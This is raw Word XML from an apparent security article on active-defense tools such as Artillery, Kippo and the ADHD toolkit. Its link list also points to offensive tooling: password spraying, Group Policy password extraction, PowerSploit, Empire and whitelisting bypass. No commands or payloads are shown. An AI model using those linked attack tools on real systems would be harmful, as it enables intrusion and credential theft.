      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>blackhole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> attackers when they try to connect to the fake services listening on the network with the tool Artillery by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TrustedSec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</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Use </w:t>
      </w:r>
      <w:hyperlink r:id="rId37" w:tgtFrame="_blank" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>Kippo</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> to monitor brute force SSH attacks and confuse the attackers by making it appear that they are really connected to an SSH server.</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">And many more in </w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>ADHD</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A0153C">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A015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List of Tools in ADHD –  </w:t>
      </w:r>
      <w:hyperlink r:id="rId39" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/adhdproject/adhdproject.github.io/blob/master/index.md</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A015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About ADHD –  </w:t>
      </w:r>
      <w:hyperlink r:id="rId40" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.blackhillsinfosec.com/?page_id=4419</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A015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ADHD Install instructions –  </w:t>
      </w:r>
      <w:hyperlink r:id="rId41" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.blackhillsinfosec.com/?p=5234</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A015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Artillery – </w:t>
      </w:r>
      <w:hyperlink r:id="rId42" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.trustedsec.com/artillery/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A015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153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Bugs – </w:t>
      </w:r>
      <w:hyperlink r:id="rId43" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/adhdproject/adhdproject.github.io/blob/master/Tools/WebBugServer.md</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A0153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0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Weblabyrinth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:hyperlink r:id="rId44" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/adhdproject/adhdproject.github.io/blob/master/Tools/Weblabyrinth.md</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A0153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0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Honeyports</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:hyperlink r:id="rId45" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/adhdproject/adhdproject.github.io/blob/master/Tools/HoneyPorts.md</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A0153C" w:rsidRPr="00A0153C" w:rsidRDefault="00A0153C" w:rsidP="00A0153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0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kippo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A0153C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:hyperlink r:id="rId46" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00A0153C">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://github.com/adhdproject/adhdproject.github.io/blob/master/Tools/Kippo.md</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D02CB1" w:rsidRDefault="00D02CB1">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>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1171A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="097C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40051"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="900A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C5A5C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="80BC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A40BC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7436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3C"/>
    <w:rsid w:val="00A0153C"/>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10539-2119-49FA-8A6F-C19E7827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153C"/>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153C"/>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5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153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153C"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A0153C"/>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has-text-color">
    <w:name w:val="has-text-color"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00A0153C"/>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A0153C"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00A0153C"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A0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5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21820">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1817140763">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1271737598">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="76704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ackhillsinfosec.com/?p=5282" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/adhdproject/adhdproject.github.io/blob/master/index.md" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.didierstevens.com/2010/02/04/cmd-dll/" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/adhdproject/adhdproject.github.io/blob/master/Tools/WebBugServer.md" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.trustedsec.com/artillery/" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/url?q=http://www.blackhillsinfosec.com/?team%3Ddavid-fletcher&amp;sa=D&amp;ust=1477499567398000&amp;usg=AFQjCNEBwflKPG4lCj3ooku0N-ooyQgi2A" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhillsinfosec.com/?team=beau-bullock" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhillsinfosec.com/?p=5257" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/post/windows/gather/credentials/gpp" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/url?q=https://github.com/adhdproject&amp;sa=D&amp;ust=1477499567429000&amp;usg=AFQjCNG5L11Q92BdRthpEsH9j76k36z2mA" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/adhdproject/adhdproject.github.io/blob/master/index.md" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/adhdproject/adhdproject.github.io/blob/master/Tools/Kippo.m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ReactOS" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=MYxk73DsGQI" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhillsinfosec.com/?p=5234" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhillsinfosec.com/?team=sally-vandeven" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://technet.microsoft.com/en-us/mt227395.aspx" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/url?q=https://github.com/adhdproject/adhdproject.github.io/blob/master/Tools/Kippo.md&amp;sa=D&amp;ust=1477499567433000&amp;usg=AFQjCNELWzsDW5Ad5FiGIAuZuJ_twlR0-g" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhillsinfosec.com/?page_id=4419" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/adhdproject/adhdproject.github.io/blob/master/Tools/HoneyPorts.md" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhillsinfosec.com/?team=david-fletcher" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhillsinfosec.com/?p=5089" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tools.kali.org/password-attacks/gpp-decrypt" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/adaptivethreat/Empire" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.google.com/url?q=https://github.com/adhdproject/adhdproject.github.io/blob/master/Tools/HoneyPorts.md&amp;sa=D&amp;ust=1477499567433000&amp;usg=AFQjCNFahITqOSf8oARGKTSNuqBlzs1hvw" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://grrcon.com" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.reactos.org/" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhillsinfosec.com/?p=4667" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/adhdproject/adhdproject.github.io/blob/master/Tools/Weblabyrinth.md" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhillsinfosec.com/?page_id=4589" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dafthack/DomainPasswordSpray" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blogs.technet.microsoft.com/grouppolicy/2009/04/22/passwords-in-group-policy-preferences-updated/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wald0.com/?p=68" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/adhdproject/adhdproject.github.io/blob/master/Tools/Weblabyrinth.md" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/adhdproject/adhdproject.github.io/blob/master/Tools/WebBugServer.md"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2472</Words>
  <Characters>14096</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>117</Lines>
  <Paragraphs>33</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>16535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2023-11-30T05:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-30T05:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>